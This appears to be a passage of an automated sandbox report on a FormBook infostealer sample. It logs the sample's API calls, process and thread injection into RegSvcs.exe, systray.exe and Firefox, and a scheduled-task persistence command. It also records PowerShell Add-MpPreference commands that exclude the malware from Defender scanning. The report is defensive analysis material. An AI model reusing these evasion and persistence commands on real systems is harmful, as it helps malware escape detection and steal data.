                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtQueryInformationToken: Direct from: 0x77392CAC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtCreateFile: Direct from: 0x77392FEC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtOpenFile: Direct from: 0x77392DCC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtTerminateThread: Direct from: 0x77392FCC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtDeviceIoControlFile: Direct from: 0x77392AEC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtAllocateVirtualMemory: Direct from: 0x77392BEC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtQuerySystemInformation: Direct from: 0x773948CC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtQueryVolumeInformationFile: Direct from: 0x77392F2CJump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtAllocateVirtualMemory: Direct from: 0x773948ECJump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtOpenSection: Direct from: 0x77392E0C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtAllocateVirtualMemory: Direct from: 0x77393C9C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtSetInformationThread: Direct from: 0x773863F9
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtClose: Direct from: 0x77392B6C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtSetInformationThread: Direct from: 0x77392B4C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtReadVirtualMemory: Direct from: 0x77392E8CJump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtCreateKey: Direct from: 0x77392C6C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtQueryAttributesFile: Direct from: 0x77392E6C
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 7860Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\systray.exeThread APC queued: target process: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C28008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 115E008Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780676303.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000000.2541053355.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000000.2688907480.0000000001021000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780676303.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000000.2541053355.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000000.2688907480.0000000001021000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780676303.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000000.2541053355.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000000.2688907480.0000000001021000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780676303.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000000.2541053355.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000000.2688907480.0000000001021000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeQueries volume information: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.3031.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.3031.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeQueries volume information: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
